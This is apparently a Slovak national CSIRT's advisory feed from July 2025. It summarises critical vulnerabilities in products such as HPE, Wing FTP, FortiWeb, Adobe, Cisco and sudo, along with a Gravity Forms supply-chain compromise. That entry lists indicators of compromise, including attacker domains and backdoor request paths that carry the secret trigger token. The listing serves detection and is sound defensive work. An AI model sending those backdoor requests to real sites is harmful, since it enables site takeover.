134.199.202[.]205 (adresa zneužívajúca dané zraniteľnosti)
104.238.159[.]149 (adresa zneužívajúca dané zraniteľnosti)
188.130.206[.]168 (adresa zneužívajúca dané zraniteľnosti)

Odkazy:

Zraniteľnosti zariadení Hewlett-Packard Enterprise Networking Instant On Access Point

Marian Danko — Mon, 21 Jul 2025 15:13:47 +0000

Hewlett-Packard Enterprise (HPE) vydala bezpečnostné aktualizácie pre firmvér zariadení Networking Instant On Access Point, ktoré opravujú jednu kritickú a jednu vysoko závažnú zraniteľnosť. CVE‑2025‑37103 súvisí s napevno kódovanými prihlasovacími údajmi a CVE-2025-37102 umožňuje vykonávať systémové príkazy.

Zraniteľné systémy:

zariadenia HPE Networking Instant On Access Point s firmvérom verzie 3.2.0.1 a staršími

Opis činnosti:

CVE-2025-37103 (CVSS skóre 9,8)

Napevno kódované prihlasovacie údaje umožňujú vzdialeným útočníkom získať administrátorský prístup k webovému rozhraniu zariadenia. Tým môžu meniť konfiguráciu, inštalovať zadné vrátka alebo odpočúvať sieť.

CVE-2025-37102 (CVSS skóre 7,2)

Zraniteľnosť umožňuje vzdialenému autentifikovanému útočníkovi injektovať ľubovoľné príkazy v konzole zraniteľného zariadenia a získať možnosť vykonávať príkazy na podkladovom systéme.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia firmvéru zariadení HPE Networking Instant On Access Point aspoň na verziu 3.2.1.0.

Odkazy:

VJ CSIRT spolupracuje pri zásahu v Dnipre (Ukrajina) pre bombové hrozby na školách

Marian Danko — Wed, 16 Jul 2025 10:56:43 +0000

VJ CSIRT (v gescii Sekcie kybernetickej bezpečnosti MIRRI SR) sa aktívne podieľala na riešení mimoriadne závažného bezpečnostného incidentu v úzkej spolupráci s Národnou centrálou osobitných druhov kriminality (NCODK), Protiteroristickou centrálou, Národnou centrálou proti terorizmu, extrémizmu a kybernetické kriminalite SKPV (ČR), Protizločineckou jednotkou ÚBOK a Kybernetickou políciou Ukrajiny. V rámci tejto spolupráce sme poskytli naše odborné kapacity a technické nástroje, ktoré významným spôsobom prispeli k identifikácii a odhaleniu útočníka, ktorý v medzinárodnom meradle šíril bombové hrozby voči viacerým členským štátom Európskej únie. Tento prípad jasne ukázal, aký význam má efektívna koordinácia medzi bezpečnostnými zložkami a technologickými partnermi. Sme hrdí, že sme mohli byť súčasťou tohto medzinárodného tímu, ktorý posilnil bezpečnosť občanov a ochranu verejného poriadku nielen na Slovensku, ale aj v Európe.

Členovia tímu CSIRT.SK na Letnej škole kyberkriminality 2025

Marian Danko — Tue, 15 Jul 2025 15:02:34 +0000

V dňoch, 30. 6. – 4. 7. 2025 sa členovia VJ CSIRT zúčastnili Letnej školy kyberkriminality 2025, ktorú organizoval tím na riešenie počítačových bezpečnostných incidentov (CSIRT-UPJS), zameranej na priebeh riešenia kybernetického bezpečnostného incidentu, ako aj riešenia kybernetického trestného činu. Členovia VJ CSIRT vystupovali v roliach expertov na riešenie kybernetických bezpečnostných incidentov, hodnotiteľa projektov, služobne mladší aj ako účastníci.

Na letnej škole kyberkriminality si študenti vyskúšali, aké to je byť súčasťou tímu pre riešenie kybernetických bezpečnostných incidentov. Ich úlohou bolo reagovať na bezpečnostný incident nielen z technickej, ale aj z právnej stránky, keďže dôležitým prvkom Letnej školy je interdisciplinárny pohľad. Na úvod sa oboznámili s prostredím nástrojov bezpečnostného operačného centra (SOC) a analyzovali logy s cieľom vypracovať úvodný návrh časovej osi útoku. Následne sa venovali právnym aspektom – simulovali nahlásenie porušenia GDPR, podanie trestného oznámenia a dokonca aj vykonanie domovej prehliadky. Na dátach zaistených zariadení počas prehliadky študenti vykonali forenznú analýzu. Analyzovali zariadenia s operačným systémom Windows alebo GNU/Linux, ako aj malvér, ktorý útočník použil. Výsledkom všetkých aktivít bola finálna správa o bezpečnostnom incidente, ktorá obsahovala kompletný prehľad o celom priebehu útoku a reakcie naň.

Za vynikajúcu organizáciu podujatia a zvyšovanie povedomia o kybernetickej bezpečnosti by sme sa chceli poďakovať akademickému CSIRT-u Univerzity Pavla Jozefa Šafárika (CSIRT-UPJS) a menovite aj jeho vedúcemu, doc. RNDr. JUDr. Pavol Sokol, PhD. et PhD. a celému jeho tímu, ako aj expertom z praxe (hlavnými spoluautormi riešeného prípadu a podkladov sú Mgr. Ladislav Bačo zo spoločnosti ESET a JUDr. Michal Rampášek z CSIRT.SK), ktorí počas týždňa odovzdávali svoje cenné skúsenosti ďalej.

WordPress plugin Gravity Forms zneužitý na šírenie škodlivého kódu

Marian Danko — Tue, 15 Jul 2025 14:56:33 +0000

Útočníci kompromitovali systémy vývojárov populárneho modulu Gravity Forms pre WordPress a modifikáciou inštalačných súborov zrealizovali útok na dodávateľský reťazec, čím ohrozili všetkých jeho používateľov. Jedná sa o celosvetovo rozšírený plugin, ktorý používajú aj spoločnosti ako Airbnb, Nike, Unicef či Google.

Zraniteľné systémy:

Modul WordPress Gravity Forms vo verziách 2.9.11.1 a 2.9.12, ktoré boli medzi 9. a 10. júlom 2025 nainštalované prostredníctvom inštalátorov stiahnutých z webovej stránky výrobcu alebo prostredníctvom nástroja composer

Opis útoku:

Útočníci bližšie nešpecifikovaným spôsobom kompromitovali systémy vývojárov a modifikovali inštalačné súbory modulu.

PHP súbor gravityforms/common.php obsahoval škodlivý kód, ktorý zbieral údaje ako metadáta, URL odkazy, cestu k administratívnemu rozhraniu, zoznam inštalovaných tém a modulov a informácie o inštalovanej verzii PHP a redakčného systému WordPress. Uvedené údaje prostredníctvom HTTP požiadaviek POST zasielal na útočníkovu doménu gravityapi[.]org/sites.

Odpoveď útočníkovho servera obsahovala PHP malvér kódovaný prostredníctvom BASE64, ktorý sa do súborov redakčného systému uložil ako wp-includes/bookmark-canonical.php. Malvér sa vydával za modul WordPress Content Management Tools a neautentifikovanému útočníkovi umožňoval vzdialené vykonanie kódu. Útočníkove vstupy sa spúšťali prostredníctvom funkcie EVAL.

Škodlivý kód bol odhalený aj vo funkcii list_sections v rámci includes/settings/class-settings.php, ktorá je volaná v rámci notification.php. Funkcia kontroluje hodnotu premennej $_REQUEST[‘gf_api_token’] a v prípade špecifickej hodnoty vykonáva operácie definované v rámci $_REQUEST[‘gf_api_action’]. Škodlivé operácie umožňujú vytvorenie nových administrátorských účtov, vykonanie škodlivého kódu prostredníctvom funkcie EVAL, nahratie súborov na server, zobrazenie používateľských kont v redakčnom systéme, mazanie používateľov a zobrazenie výpisu súborov na súborovom systéme.

Vývojári škodlivý kód po prijatí hlásenia incidentu odstránili a vydali verziu 2.9.13, ktorá ho už neobsahuje.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Získanie úplnej kontroly nad systémom

Odporúčania:

Spoločnosť RocketGenius, ktorá je vývojárom modulu a bezpečnostní výskumníci z Patchstack odporúčajú bezodkladnú reinštaláciu všetkých inštancií modulu, ktoré boli medzi 9. a 10. júlom 2025 inštalované prostredníctvom inštalátorov z webovej stránky alebo prostredníctvom nástroja composer, na verziu 2.9.13.

Rovnako odporúčame preveriť integritu databázy a súborov redakčného systému WordPress a logy CMS, sieťových a bezpečnostných prvkov na prítomnosť indikátorov kompromitácie.

Zdroje:

Indikátory kompromitácie:

24.245.59[.]0
185.193.89[.]19
185.243.113[.]108
193.160.101[.]6
194.87.63[.]219
gravityapi[.]org
gravityapi[.]io
gravityforms/common.php
- hľadajte prítomnosť reťazca gravityapi[.]org a funkcie update_entry_detail
includes/settings/class-settings.php
- hľadajte prítomnosť funkcie list_sections
wp-includes/bookmark-canonical.php
wp-includes/block-caching.php
volania v tvare:
- /wp-content/plugins/gravityforms_2.9.12/notification.php?gf_api_token=Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3&action=
- /wp-content/plugins/gravityforms_2.9.11.1/notification.php?gf_api_token=Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3&action=
- /wp-content/plugins/gravityforms/notification.php?gf_api_token=Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3&action=

Aktívne zneužívaná kritická zraniteľnosť vo Wing FTP

Marian Danko — Tue, 15 Jul 2025 14:53:48 +0000

Vývojári FTP servera Wing FTP vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-47812 možno zneužiť na vzdialené vykonanie systémových príkazov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Wing FTP vo verziách starších ako 7.4.4

Opis zraniteľnosti:

CVE-2025-47812 (CVSS skóre 10,0)

Kritická zraniteľnosť sa nachádza vo webovom rozhraní servera a spočíva v nesprávnom spracovaní tzv. nulových bajtov (‘\0’) v rámci parametra username v koncovom bode loginok.html. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených vstupov mohol zneužiť na injekciu kódu v jazyku Lua do súborov používateľských relácií a následné vykonanie systémových príkazov s oprávneniami root (Linux) alebo NT AUTHORITY\SYSTEM (Windows).

Zraniteľnosť je aktívne zneužívaná minimálne od 1. júla 2025. Útočníci po získaní prístupu do systému spúšťajú rôzne príkazy pre enumeráciu a prieskum infraštruktúry, tvorbu nových používateľských účtov za účelom zachovania perzistencie, exfiltráciu citlivých údajov prostredníctvom cURL a LUA súbory slúžiace na doručenie inštalátora nástroja pre vzdialený manažment zariadení ScreenConnect. K samotnej inštalácii ScreenConnect v rámci analyzovaných incidentov zatiaľ nedošlo.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu Wing FTP na verziu 7.4.4 alebo novšiu. V prípade, že aktualizáciu nie je možné vykonať, odporúčame vypnúť alebo obmedziť prístup k webovému rozhraniu aplikácie, deaktivovať anonymné prihlásenia a nasadiť zvýšený monitoring obsahu priečinka so súbormi používateľských relácií.

Taktiež odporúčame v logoch aplikácie a sieťových a bezpečnostných prvkov preveriť prítomnosť pokusov o zneužitie zraniteľnosti. Detailný popis zraniteľnosti, návod pre detekciu pokusov o jej zneužitie, indikátory kompromitácie a SIGMA pravidlá pre detekciu môžete nájsť online v analýze výskumníkov z Huntress.

Zdroje:

Kritická zraniteľnosť v NPM knižnici mcp-remote umožňuje vzdialené vykonanie príkazov

Marian Danko — Tue, 15 Jul 2025 14:49:58 +0000

Vývojári NPM knižnice mcp-remote vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. MCP (Model Context Protocol) protokol predstavuje štandard pre integráciu a výmenu dát medzi LLM modelmi a externými dátovými zdrojmi alebo službami. CVE-2025-6514 možno zneužiť na vzdialené vykonanie príkazov operačného systému.

Zraniteľné systémy:

mcp-remote vo verziách 0.0.5 až 0.1.15

Opis zraniteľnosti:

CVE-2025-6514 (CVSS 3.1 skóre: 9,6)

Kritická zraniteľnosť spočíva v mechanizme spracovania dát prenášaných počas autorizačnej fázy zostavovania spojenia so vzdialeným MCP serverom. Vzdialený útočník by prostredníctvom špeciálne konfigurovaného MCP servera mohol do týchto dát vložiť príkaz, ktorý po spracovaní prostredníctvom mcp-remote vykoná operačný systém. Na operačnom systéme Windows má útočník plnú kontrolu nad parametrami príkazu. V prípade operačných systémov macOS a Linux má len obmedzenú kontrolu nad parametrami.

Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí iniciovať spojenie s MCP serverom pod kontrolou útočníka.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a vývojárom odporúčame uistiť sa, či ich aplikácie a služby nevyužívajú NPM knižnicu mcp-remote v zraniteľných verziách. V prípade, že áno odporúčame bezodkladnú aktualizáciu na verziu 0.1.16 alebo novšiu. Za účelom zvýšenia bezpečnosti taktiež odporúčame povoliť len HTTPS komunikáciu s dôveryhodnými MCP servermi.

Zdroje:

Kritická zraniteľnosť webového aplikačného firewallu Fortinet FortiWeb

Marian Danko — Tue, 15 Jul 2025 14:46:36 +0000

Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť vo webovom aplikačnom firewalle Fortinet FortiWeb. CVE-2025-25257 možno zneužiť na vzdialené vykonanie kódu a úplné narušenie dôvernosti, integrity a dostupnosti systému.

Zraniteľné systémy:

FortiWeb 7.6.X vo verziách starších ako 7.6.4
FortiWeb 7.4.X vo verziách starších ako 7.4.8
FortiWeb 7.2.X vo verziách starších ako 7.2.11
FortiWeb 7.0.X vo verziách starších ako 7.0.11

Opis zraniteľnosti:

CVE-2025-25257 (CVSS 3.1 skóre: 9,6)

Kritická zraniteľnosť sa nachádza v grafickom používateľskom rozhraní a spočíva v nesprávnej neutralizácii špeciálnych prvkov používaných v rámci SQL príkazov. Vzdialený neautentifikovaný útočník by ju zaslaním HTTP požiadaviek so špeciálne vytvoreným bearer tokenom mohol zneužiť na SQL injekciu vedúcu k vzdialenému vykonaniu príkazov alebo kódu.

Výskumníci z WatchTowr 11. júla 2025 zverejnili proof-of-concept (PoC) kód demonštrujúci postup zneužitia zraniteľnosti na vytvorenie reverzného shell-u. V súvislosti so zverejnením PoC možno zo strany útočníkov očakávať aktivity na identifikáciu zraniteľných zariadení a následné pokusy o zneužitie zraniteľnosti.

Možné škody:

Vzdialené vykonanie kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Výrobca odporúča používať len produkty s technickou podporou. Administrátorom odporúčame bezodkladnú aktualizáciu Fortinet FortiWeb na verzie 7.6.4, 7.4.8, 7.2.11 alebo 7.0.11.

V prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať vypnutím HTTP/HTTPS prístupu k administratívnemu rozhraniu.

Zdroje:

Kritické bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Fri, 11 Jul 2025 13:56:17 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty After Effects, Substance 3D Viewer, Audition, InCopy , InDesign, Connect , Dimension, Substance 3D Stager, Illustrator, FrameMaker, AEM Forms , AEM Screens a ColdFusion, ktoré opravujú 60 zraniteľností, z čoho 38 je označených ako kritických. Kritické zraniteľnosti by vzdialený útočník mohol zneužiť na obídenie bezpečnostných prvkov, eskaláciu privilégií a vykonanie kódu.

Zraniteľné systémy:

Adobe After Effects 24.6.X vo verziách starších ako 24.6.7
Adobe After Effects 25.X vo verziách starších ako 25.3
Adobe Substance 3D Viewer vo verziách starších ako 0.25
Adobe Audition 24.6.X vo verziách starších ako 24.6.7
Adobe Audition 25.X vo verziách starších ako 25.3
Adobe InCopy 20.X vo verziách starších ako 20.4
Adobe InCopy 19.X vo verziách starších ako 19.5.4
Adobe InDesign ID20.X vo verziách starších ako ID20.4
Adobe InDesign ID19.5.X vo verziách starších ako ID19.5.4
Connect Windows App vo verziách starších ako 25.1
Adobe Dimension vo verziách starších ako 4.1.3
Adobe Substance 3D Stager vo verziách starších ako 3.1.3
Illustrator 2025 29.X vo verziách starších ako 29.6
Illustrator 2024 28.7.X vo verziách starších ako 28.7.8
Adobe FrameMaker FrameMaker 2020 vo verziách bez inštalovanej záplaty Update 9
Adobe FrameMaker FrameMaker 2022 vo verziách bez inštalovanej záplaty Update 7
Adobe Experience Manager (AEM) Forms on JEE vo verziách starších ako 6.5.0.0.20250527.0
Adobe Experience Manager (AEM) Screens vo verziách starších 6.5.22 Screens FP11.6
ColdFusion 2025 vo verziách bez inštalovanej záplaty Update 3
ColdFusion 2023 vo verziách bez inštalovanej záplaty Update 15
ColdFusion 2021 vo verziách bez inštalovanej záplaty Update 21

Opis zraniteľnosti:

Adobe Substance 3D Viewer:

CVE-2025-43582 (CVSS skóre 7,8)

Zraniteľnosť spočíva v pretečení medzipamäte haldy a možno ju zneužiť na vykonanie kódu.

Adobe InCopy:

CVE-2025-47097, CVE-2025-47098, CVE-2025-47099 (CVSS skóre 7,8)

Podtečenie celočíselnej premennej (CVE-2025-47097), prístup k neinicializovanému ukazovateľu (CVE-2025-47098) a pretečenie medzipamäte haldy (CVE-2025-47099) v produkte Adobe InCopy možno podvrhnutím špeciálne vytvorených súborov zneužiť na vykonanie kódu.

Adobe InDesign:

CVE-2025-47136, CVE-2025-43591, CVE-2025-43592, CVE-2025-43594, CVE-2025-47103, CVE-2025-47134 (CVSS skóre 7,8)

Zraniteľnosti v InDesign spočívajúce v podtečení celočíselnej premennej (CVE-2025-47136), prístupe k neinicializovanému ukazovateľu (CVE-2025-43592), zápise mimo povolených hodnôt (CVE-2025-43594) a pretečení medzipamäte haldy (CVE-2025-43591, CVE-2025-47103, CVE-2025-47134) možno zneužiť na vykonanie kódu.

Adobe Connect:

CVE-2025-27203 (CVSS skóre 9,3)

Kritickú zraniteľnosť s identifikátorom CVE-2025-27203 možno zneužiť podvrhnutím špeciálne vytvorených dát, ktorých deserializácia vedie k vykonaniu kódu.

Adobe Dimension:

CVE-2025-30312 (CVSS skóre 7,8)

Zápis mimo povolených hodnôt v Adobe Dimension možno zneužiť na vykonanie kódu.

Adobe Illustrator:

CVE-2025-49526, CVE-2025-49527, CVE-2025-49528, CVE-2025-49529, CVE-2025-49530, CVE-2025-49531, CVE-2025-49532 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v pretečení (CVE-2025-49531) a podtečení (CVE-2025-49532) celočíselnej premennej, pretečení vyrovnávacej pamäte zásobníka (CVE-2025-49527, CVE-2025-49528), prístupe k neinicializovanému ukazovateľu (CVE-2025-49529) a zápise mimo povolených hodnôt (CVE-2025-49526, CVE-2025-49530) možno zneužiť na vykonanie kódu.

Adobe FrameMaker:

CVE-2025-47121, CVE-2025-47122, CVE-2025-47123, CVE-2025-47124, CVE-2025-47125, CVE-2025-47126, CVE-2025-47127, CVE-2025-47128, CVE-2025-47129, CVE-2025-47130, CVE-2025-47131, CVE-2025-47132, CVE-2025-47133 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v podtečení celočíselnej premennej (CVE-2025-47128, CVE-2025-47130), prístupe k neinicializovanému ukazovateľu (CVE-2025-47121), pretečení medzipamäte haldy (CVE-2025-47122, CVE-2025-47123, CVE-2025-47125, CVE-2025-47131) a zápise mimo povolených hodnôt (CVE-2025-47124, CVE-2025-47126, CVE-2025-47127, CVE-2025-47129, CVE-2025-47132, CVE-2025-47133) možno zneužiť na vykonanie kódu.

Adobe AEM Forms:

CVE-2025-49533 (CVSS skóre 9,8)

CVE-2025-49533 možno zneužiť podvrhnutím špeciálne vytvorených dát, ktorých deserializácia vedie k vykonaniu kódu. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.

Adobe ColdFusion:

CVE-2025-49535 (CVSS skóre 9,3)

Kritickú zraniteľnosť by vzdialený neautentifikovaný útočník prostredníctvom XXE (XML External Entity) referencie mohol zneužiť na čítanie obsahu ľubovoľných súborov na súborovom systéme. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.

CVE-2025-49551 (CVSS skóre 8,8)

Zraniteľnosť spočívajúcu v existencii zabudovaného používateľského konta s predvoleným heslom by útočník nachádzajúci sa v rovnakom sieťovom segmente mohol zneužiť na získanie neoprávneného prístupu do systému. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.

CVE-2025-49536, CVE-2025-49537 (CVSS skóre 8,1)

Nesprávnu autorizáciu (CVE-2025-49536) možno zneužiť na obídenie bezpečnostného prvku. CVE-2025-49537 spočívajúcu v nesprávnej neutralizácii špeciálnych elementov používaných v rámci príkazov operačného systému by vzdialený autentifikovaný útočník mohol zneužiť na čítanie obsahu ľubovoľných súborov na súborovom systéme. Zneužitie zraniteľností nevyžaduje interakciu používateľa.

CVE-2025-49538 (CVSS skóre 7,4)

Blind Xpath XML injekciu by vzdialený neautentifikovaný útočník mohol zneužiť na čítanie obsahu ľubovoľných súborov na súborovom systéme. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa.

Pozn.: Ak nie je uvedené inak, zneužitie všetkých vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.

Možné škody:

Vykonanie škodlivého kódu
Obídenie bezpečnostného prvku
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnený prístup do systému
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v časti Zraniteľné systémy alebo na webových stránkach výrobcu uvedených v časti Zdroje. Zároveň odporúčame poučiť používateľov, aby neotvárali správy a prílohy z neznámych a nedôveryhodných zdrojov.

Zdroje:

Zraniteľnosť v ServiceNow Now Platform možno zneužiť na neoprávnený prístup k údajom

Marian Danko — Fri, 11 Jul 2025 13:53:52 +0000

Spoločnosť ServiceNow vydala bezpečnostné aktualizácie svojej cloudovej manažmentovej platformy Now Platform, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-3648 by neautentifikovaný alebo autentifikovaný útočník mohol zneužiť na získanie prístupu k citlivým údajom.

Zraniteľné systémy:

ServiceNow Now PLatform vo verziách starších ako Xanadu a Yokohama

Opis zraniteľnosti:

CVE-2025-3648 (CVSS skóre 8,2)

Zraniteľnosť, ktorú bezpečnostní výskumníci z Varonis označujú ako Count(er) Strike, spočíva v logickej chybe vyhodnocovania ACL (Access Control List) pravidiel a neautentifikovaný aj autentifikovaný útočník by ju prostredníctvom tzv. range query požiadaviek mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom, vrátane prihlasovacích údajov.

Pozn.: Zraniteľnosť je možné zneužiť len pri špecifickej konfigurácii ACL pravidiel. Bližšie informácie môžete nájsť v analýze výskumníkov z Varonis, ktorí zraniteľnosť objavili.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať aktualizáciu zraniteľných systémov na verzie Xanadu alebo Yokohama, v rámci ktorých boli zavedené nové bezpečnostné funkcie ako Query ACL, Security Data Filters a Deny-Unless ACL a postupovať podľa odporúčaní výrobcu zverejnených v rámci dokumentov KB2256712 a KB2046494. Uvedené dokumenty sú dostupné len pre prihlásených používateľov.

Zdroje:

Kritickú zraniteľnosť Anthropic MCP Inspector možno zneužiť na vzdialené vykonanie kódu

Marian Danko — Tue, 08 Jul 2025 14:06:49 +0000

Spoločnosť Anthropic vydala bezpečnostné aktualizácie svojho projektu na testovanie a debugovanie MCP (Model Context Protocol) serverov MCP Inspector, ktoré opravujú kritickú zraniteľnosť. CVE-2025-49596 možno zneužiť na vzdialené vykonanie kódu vedúce k úplnému narušeniu dôvernosti, integrity a dostupnosti systému.

Zraniteľné systémy:

Anthropic MCP Inspector vo verziách starších ako 0.14.1

Opis zraniteľnosti:

CVE-2025-49596 (CVSS v. 4.0 skóre 9,4)

Kritická zraniteľnosť spočíva v chýbajúcej autentifikácii medzi klientom poskytujúcim interaktívne webové rozhranie a proxy serverom prepájajúcim toto rozhranie s rozličnými MCP servermi. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na realizáciu CSRF útokov (Cross Site Request Forgery) vedúcich k vykonaniu MCP príkazov prostredníctvom stdio. Vykonaním špecifických príkazov možno získať úplnú kontrolu nad systémom.

Zneužitie zraniteľnosti na verejne dostupných serveroch MCP Inspector nevyžaduje interakciu používateľa. Zraniteľnosť je však možné zneužiť aj na verejne neprístupných inštanciách, čo vyžaduje, aby obeť otvorila špeciálne vytvorenú webovú stránku zneužívajúcu SSE (Server Sent Events) a staršiu zraniteľnosť webových prehliadačov 0.0.0.0 Day.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu Anthropic MCP Inspector na verziu 0.14.1 alebo novšiu. V rámci postupov best practice odporúčame MCP servery prevádzkovať izolované od internetu.

Zdroje:

Zraniteľnosť v module Forminator možno zneužiť na kompromitáciu WordPress

Marian Danko — Tue, 08 Jul 2025 14:03:36 +0000

Vývojári modulu WordPress The Forminator Forms vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-6463 možno zneužiť na odstránenie súborov redakčného systému a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress The Forminator Forms – Contact Form, Payment Form & Custom Form Builder vo verzii 1.44.2 a starších

Opis zraniteľnosti:

CVE-2025-6463 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov vo funkcii save_entry_fields() a súborových ciest v rámci funkcie entry_delete_upload_file(). Vzdialený neautentifikovaný útočník by ju mohol zneužiť na zmazanie ľubovoľných súborov redakčného systému. Zmazaním špecifických súborov ako napr. wp-config.php možno opätovne inicializovať konfiguráciu webstránky a získať úplnú kontrolu nad systémom.

Možné škody:

Neoprávnená zmena v systéme
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu modulu The Forminator Forms na verziu 1.44.3 alebo novšiu. Rovnako odporúčame preveriť integritu súborov redakčného systému WordPress a logy CMS, sieťových a bezpečnostných prvkov na prítomnosť pokusov o zneužitie zraniteľnosti.

Zdroje:

Kritická zraniteľnosť v Cisco Unified Communications Manager

Marian Danko — Mon, 07 Jul 2025 13:23:08 +0000

Zraniteľnosť v produktoch Cisco Unified Communications Manager (Unified CM) a Cisco Unified Communications Manager Session Management Edition (Unified CM SME) môže umožniť neautentifikovanému vzdialenému útočníkovi prihlásiť sa do napadnutého zariadenia ako používateľ root.

Zraniteľné systémy:

Cisco Unified CM verzie 15.0.1.13010 – 15.0.1.13017-1
Cisco Unified CM SME Engineering Special (ES) verzie 15.0.1.13010 – 15.0.1.13017-1

Cisco ďalej upozorňuje, že zraniteľnosť sa netýka rovnomenných produktov vo verzii 12.5 a 14

Opis zraniteľnosti:

CVE-2025-20309 (CVSS 3.1 skóre 10,0)

Zraniteľnosť umožňuje neoprávnené prihlásenie do účtu root s pôvodnými statickými prihlasovacími údajmi, ktoré nemožno zmeniť ani vymazať. Tieto prihlasovacie údaje boli neúmyselne ponechané v produkčných systémoch z obdobia vývoja aplikácie. Útočník týmto môže získať oprávnenie na spúšťanie ľubovoľných príkazov, prístup k hovorom prebiehajúcich cez zraniteľný softvér a prihlasovacím údajom používateľov.

Možné škody:

Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Vzhľadom na kritickosť zraniteľnosti odporúčame bezodkladnú aktualizáciu na verziu 15SU3 alebo aplikovať aktualizačný súbor, dostupný na https://software.cisco.com/download/home/286331940/type/286319173/release/COP-Files

Spoločnosť Cisco uvádza, že indikátorom zneužitia môžu byť logy zariadenia obsahujúce výraz sshd s úspešným SSH prihlásením ako užívateľ root. Na získanie týchto logov možno použiť príkaz:

cucm1# file get activelog syslog/secure

Príklad logu kompromitovaného systému:

Apr 6 10:38:43 cucm1 authpriv 6 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0) Apr 6 10:38:43 cucm1 authpriv 6 sshd: pam_unix(sshd:session): session opened for user root by (uid=0)

Zdroje:

Mesačná správa CSIRT.SK – jún 2025

Marian Danko — Mon, 07 Jul 2025 11:34:06 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci jún 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 06/2025 PDF (1 470 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritická zraniteľnosť Sudo

Marian Danko — Fri, 04 Jul 2025 12:27:41 +0000

Výskumník z Stratascale Cyber Research Unit objavil kritickú zraniteľnosť v softvérovom balíčku sudo, ktorá neoprávnenému používateľovi umožňuje lokálnu eskaláciu privilégií na Unixových a Unixu-podobným operačných systémov.
[Aktualizácia 1.10.2025] Zraniteľnosť CVE-2025-32463 je aktívne zneužívaná.

Zraniteľné systémy:

CVE-2025-32462 sudo 1.8.8 – 1.8.32 a 1.9.0 – 1.9.17

Oracle Linux 8
RHEL (všetky podporované verzie)
CentOS (všetky podporované verzie)
Alma Linux (všetky podporované verzie)
openSUSE (všetky podporované verzie)
Ubuntu (všetky podporované verzie)
Fedora (všetky podporované verzie)
Debian 10 a všetky podporované verzie
Arch Linux
FreeBSD 13, 14
NetBSD 9.4, 10.1
macOS Sequoia

CVE-2025-32463 sudo 1.9.14 – 1.9.17

RHEL 10
CentOS 10 Stream
AlmaLinux 10
openSUSE (všetky podporované verzie)
Ubuntu (všetky podporované verzie)
Fedora (všetky podporované verzie)
Debian Sid
Arch Linux
FreeBSD 13, 14
NetBSD 9.4, 10.1

Opis zraniteľnosti:

CVE-2025-32462 (CVSS 3.1 skóre 2.8)

Sudo verzie pred 1.9.17p1 pri použití so súborom sudoers, ktorý špecifikuje hostiteľa iného ako je aktuálny alebo ALL, umožňuje používateľom vykonávať neoprávnené príkazy ako root.

CVE-2025-32463 (CVSS 3.1 skóre 9.3)

Sudo vo verziách pred 1.9.17p1 umožňuje lokálnym používateľom získať oprávnenia používateľa root, pretože pri použití operátora --chroot sa načítava súbor /etc/nsswitch.conf zo súboru špecifikovaného používateľom.
[Aktualizácia 1.10.2025] Zraniteľnosť je aktívne zneužívaná.

Možné škody:

Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Užívateľom na zraniteľných systémoch odporúčame sledovať aktualizácie od svojho poskytovateľa softvérových balíčkov. Ubuntu, Debian a openSUSE (a ich derivátne distribúcie) už obsahujú aktualizované balíčky verzie 1.9.17p1 a vyššie.

